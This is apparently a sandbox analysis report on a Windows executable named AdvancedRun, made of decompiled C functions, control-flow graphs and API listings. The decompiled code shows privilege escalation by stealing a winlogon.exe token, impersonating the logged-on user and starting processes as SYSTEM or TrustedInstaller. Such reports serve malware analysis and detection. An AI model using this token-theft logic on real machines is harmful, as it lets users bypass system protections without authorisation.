                                                                  0x0040871b
                                                                  0x00000000
                                                                  0x0040871b
                                                                  0x004085d5
                                                                  0x004085da
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004085ec
                                                                  0x004085ef
                                                                  0x004085f6
                                                                  0x004085fd
                                                                  0x00408604
                                                                  0x0040860b
                                                                  0x00408612
                                                                  0x00408616
                                                                  0x00408620
                                                                  0x0040862a
                                                                  0x00408632
                                                                  0x00408633
                                                                  0x00408638
                                                                  0x0040864f
                                                                  0x00408651
                                                                  0x00000000
                                                                  0x0040854f
                                                                  0x0040854f
                                                                  0x00408550
                                                                  0x00408556
                                                                  0x00408556

                                                                  APIs
                                                                    • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                    • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                    • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                    • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                  • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                  • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                  • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                  • swscanf.MSVCRT ref: 00408620
                                                                  • _wtoi.MSVCRT ref: 00408633
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                  • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                  • API String ID: 3933224404-3784219877
                                                                  • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                  • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                  • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                  • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 210 401fe6-402002 211 4020a8-4020ab 210->211 212 402008-40206e memset * 2 call 404c3c wcslen * 2 210->212 213 4020f3-4020f6 211->213 214 4020ad-4020bc wcslen 211->214 221 402070-402089 call 404be4 212->221 222 40208b 212->222 217 402162-402165 213->217 218 4020f8-402105 call 40598b 213->218 219 4020c2-4020d5 call 404ea9 214->219 220 4022cb-4022d2 214->220 223 4021f2-4021f5 217->223 224 40216b-40217b OpenSCManagerW 217->224 218->220 240 40210b-402114 call 401e44 218->240 243 4020e6-4020e7 call 401df9 219->243 244 4020d7-4020e4 _wtoi call 401e44 219->244 232 402092-4020a6 call 401df9 221->232 222->232 228 402235-402238 223->228 229 4021f7-402203 call 401d99 223->229 230 402184-402192 call 401f04 224->230 231 40217d-40217e call 401306 224->231 241 4022a0-4022be CreateProcessW 228->241 242 40223a-402254 228->242 229->220 256 402209-402227 call 40a46c 229->256 230->220 258 402198-4021ac call 401df9 230->258 247 402183 231->247 259 402119-40211b 232->259 240->259 248 4022c0 241->248 252 402266-402276 call 40289f 242->252 253 402256-402262 wcschr 242->253 255 4020ec-4020f1 243->255 244->255 247->230 248->220 257 4022c2 GetLastError 248->257 268 402278-402298 252->268 269 40229a 252->269 253->252 260 402264 253->260 263 40211e 255->263 256->220 274 40222d-402230 256->274 265 4022c8 257->265 275 4021e7-4021ed RevertToSelf 258->275 276 4021ae-4021d3 call 4028ed 258->276 259->263 260->252 263->220 272 402124-402149 call 4028ed 263->272 265->220 273 40229c-40229e 268->273 269->273 282 402154-40215d CloseHandle 272->282 283 40214b-402151 GetLastError 272->283 273->248 274->265 275->220 284 4021d5-4021db GetLastError 276->284 285 4021de-4021e1 CloseHandle 276->285 282->220 283->282 284->285 285->275
                                                                  C-Code - Quality: 81%
                                                                  			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                  0x00401fe6
                                                                  0x00401ff1
                                                                  0x00401ff3
                                                                  0x00401fff
                                                                  0x00402002
                                                                  0x004020a8
                                                                  0x004020ab
                                                                  0x004020f3
                                                                  0x004020f6
                                                                  0x00402162
                                                                  0x00402165
                                                                  0x004021f2
                                                                  0x004021f5
                                                                  0x00402235
                                                                  0x00402238
                                                                  0x004022be
                                                                  0x0040223a
                                                                  0x0040223a
                                                                  0x00402240
                                                                  0x0040224b
                                                                  0x0040224e
                                                                  0x00402251
                                                                  0x00402254
                                                                  0x00402259
                                                                  0x0040225e
                                                                  0x00402262
                                                                  0x00402264
                                                                  0x00402264
                                                                  0x00402264
                                                                  0x00402262
                                                                  0x00402266
                                                                  0x0040226c
                                                                  0x00402271
                                                                  0x00402274
                                                                  0x00402276
                                                                  0x0040229a
                                                                  0x0040229a
                                                                  0x00402278
                                                                  0x00402296
                                                                  0x00402296
                                                                  0x0040229c
                                                                  0x0040229c
                                                                  0x004022c0
                                                                  0x004022c2
                                                                  0x004022c8
                                                                  0x004022c8
                                                                  0x004022c8
                                                                  0x00000000
                                                                  0x004022c0
                                                                  0x00402201
                                                                  0x00402203
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402220
                                                                  0x00402225
                                                                  0x00402227
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040222d
                                                                  0x00000000
                                                                  0x0040222d
                                                                  0x00402173
                                                                  0x00402179
                                                                  0x0040217b
                                                                  0x0040217e
                                                                  0x00402183
                                                                  0x00402185
                                                                  0x00402188
                                                                  0x0040218d
                                                                  0x0040218f
                                                                  0x00402192
                                                                  0x004021a2
                                                                  0x004021a7
                                                                  0x004021a9
                                                                  0x004021ac
                                                                  0x004021cc
                                                                  0x004021d1
                                                                  0x004021d3
                                                                  0x004021db
                                                                  0x004021db
                                                                  0x004021e1
                                                                  0x004021e1
                                                                  0x004021e7
                                                                  0x004021e7
                                                                  0x00000000
                                                                  0x00402192
                                                                  0x004020fe
                                                                  0x00402103
                                                                  0x00402105
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402111
                                                                  0x00402114
                                                                  0x00000000
                                                                  0x00402114
                                                                  0x004020ad
                                                                  0x004020b4
                                                                  0x004020b9
                                                                  0x004020bc
                                                                  0x00000000
                                                                  0x004020c2
                                                                  0x004020c4
                                                                  0x004020ce
                                                                  0x004020d0
                                                                  0x004020d3
                                                                  0x004020d4
                                                                  0x004020d5
                                                                  0x004020e6
                                                                  0x004020e7
                                                                  0x004020d7
                                                                  0x004020d7
                                                                  0x004020dd
                                                                  0x004020de
                                                                  0x004020df
                                                                  0x004020df
                                                                  0x004020ec
                                                                  0x004020ef
                                                                  0x00000000
                                                                  0x004020ef
                                                                  0x00402008
                                                                  0x00402016
                                                                  0x0040201d
                                                                  0x0040202e
                                                                  0x00402035
                                                                  0x00402044
                                                                  0x00402049
                                                                  0x00402055
                                                                  0x00402064
                                                                  0x00402068
                                                                  0x0040206e
                                                                  0x0040208b
                                                                  0x00402070
                                                                  0x00402082
                                                                  0x00402088
                                                                  0x0040209e
                                                                  0x004020a1
                                                                  0x00402119
                                                                  0x00402119
                                                                  0x0040211b
                                                                  0x0040211e
                                                                  0x0040211e
                                                                  0x00402149
                                                                  0x00402151
                                                                  0x00402151
                                                                  0x00402157
                                                                  0x00402157
                                                                  0x004022cb
                                                                  0x004022d2
                                                                  0x004022d2

                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040201D
                                                                  • memset.MSVCRT ref: 00402035
                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                  • wcslen.MSVCRT ref: 00402050
                                                                  • wcslen.MSVCRT ref: 0040205F
                                                                  • wcslen.MSVCRT ref: 004020B4
                                                                  • _wtoi.MSVCRT ref: 004020D7
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                  • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                    • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                    • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                    • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                    • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                    • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                    • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                    • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                    • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                    • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                    • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                    • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                    • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                    • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                  • wcschr.MSVCRT ref: 00402259
                                                                  • CreateProcessW.KERNEL32 ref: 004022B8
                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                  • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                  • API String ID: 3201562063-2355939583
                                                                  • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                  • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                  • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                  • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 321 409921-409924 322 409926-40992c call 405436 321->322 323 409977 321->323 325 409931-409976 GetProcAddress * 5 322->325 325->323
                                                                  C-Code - Quality: 100%
                                                                  			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                  0x00409924
                                                                  0x0040992c
                                                                  0x00409937
                                                                  0x0040993f
                                                                  0x0040994a
                                                                  0x00409956
                                                                  0x00409962
                                                                  0x0040996e
                                                                  0x00409971
                                                                  0x00409973
                                                                  0x00000000
                                                                  0x00409976
                                                                  0x00409977

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                  • API String ID: 1529661771-70141382
                                                                  • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                  • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                  • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                  • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 326 40b2c6-40b2e0 call 40b4d4 GetModuleHandleA 329 40b301-40b304 326->329 330 40b2e2-40b2ed 326->330 332 40b32d-40b37c __set_app_type __p__fmode __p__commode call 4070dc 329->332 330->329 331 40b2ef-40b2f8 330->331 334 40b319-40b31d 331->334 335 40b2fa-40b2ff 331->335 339 40b38a-40b3e0 call 40b4c2 _initterm __wgetmainargs _initterm 332->339 340 40b37e-40b389 __setusermatherr 332->340 334->329 338 40b31f-40b321 334->338 335->329 337 40b306-40b30d 335->337 337->329 341 40b30f-40b317 337->341 342 40b327-40b32a 338->342 345 40b3f0-40b3f7 339->345 346 40b3e2-40b3eb 339->346 340->339 341->342 342->332 348 40b3f9-40b404 345->348 349 40b43e-40b442 345->349 347 40b4aa-40b4af call 40b50d 346->347 352 40b406-40b40a 348->352 353 40b40c-40b410 348->353 350 40b444-40b449 349->350 351 40b417-40b41d 349->351 350->349 357 40b425-40b436 GetStartupInfoW 351->357 358 40b41f-40b423 351->358 352->348 352->353 353->351 355 40b412-40b414 353->355 355->351 359 40b438-40b43c 357->359 360 40b44b-40b44d 357->360 358->355 358->357 361 40b44e-40b466 GetModuleHandleA call 408533 359->361 360->361 364 40b468-40b469 exit 361->364 365 40b46f-40b4a8 _cexit 361->365 364->365 365->347
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                  • String ID:
                                                                  • API String ID: 2827331108-0
                                                                  • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                  • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                  • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                  • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 90%
                                                                  			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                  0x00401f04
                                                                  0x00401f20
                                                                  0x00401f27
                                                                  0x00401f38
                                                                  0x00401f3f
                                                                  0x00401f4e
                                                                  0x00401f54
                                                                  0x00401f5f
                                                                  0x00401f6e
                                                                  0x00401f72
                                                                  0x00401f77
                                                                  0x00401f78
                                                                  0x00401f91
                                                                  0x00401f7a
                                                                  0x00401f88
                                                                  0x00401f8e
                                                                  0x00401f8e
                                                                  0x00401fa6
                                                                  0x00401fa9
                                                                  0x00401fae
                                                                  0x00401fb0
                                                                  0x00401fb2
                                                                  0x00401fb9
                                                                  0x00401fc2
                                                                  0x00401fca
                                                                  0x00401fd2
                                                                  0x00401fd2
                                                                  0x00401fd7
                                                                  0x00401fd7
                                                                  0x00401fe3

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00401F27
                                                                  • memset.MSVCRT ref: 00401F3F
                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                  • wcslen.MSVCRT ref: 00401F5A
                                                                  • wcslen.MSVCRT ref: 00401F69
                                                                  • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                    • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                    • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                  • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                  • API String ID: 3867304300-2177360481
                                                                  • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                  • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                  • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                  • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 405 409555-40955f 406 409561-40956e GetModuleHandleW 405->406 407 40958b-409592 405->407 406->407 410 409570-409586 GetProcAddress 406->410 408 409594-4095a6 GetProcessTimes 407->408 409 4095a7-4095aa 407->409 410->407
                                                                  C-Code - Quality: 100%
                                                                  			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                  0x0040955f
                                                                  0x00409566
                                                                  0x0040956e
                                                                  0x00409576
                                                                  0x00409586
                                                                  0x00409586
                                                                  0x0040956e
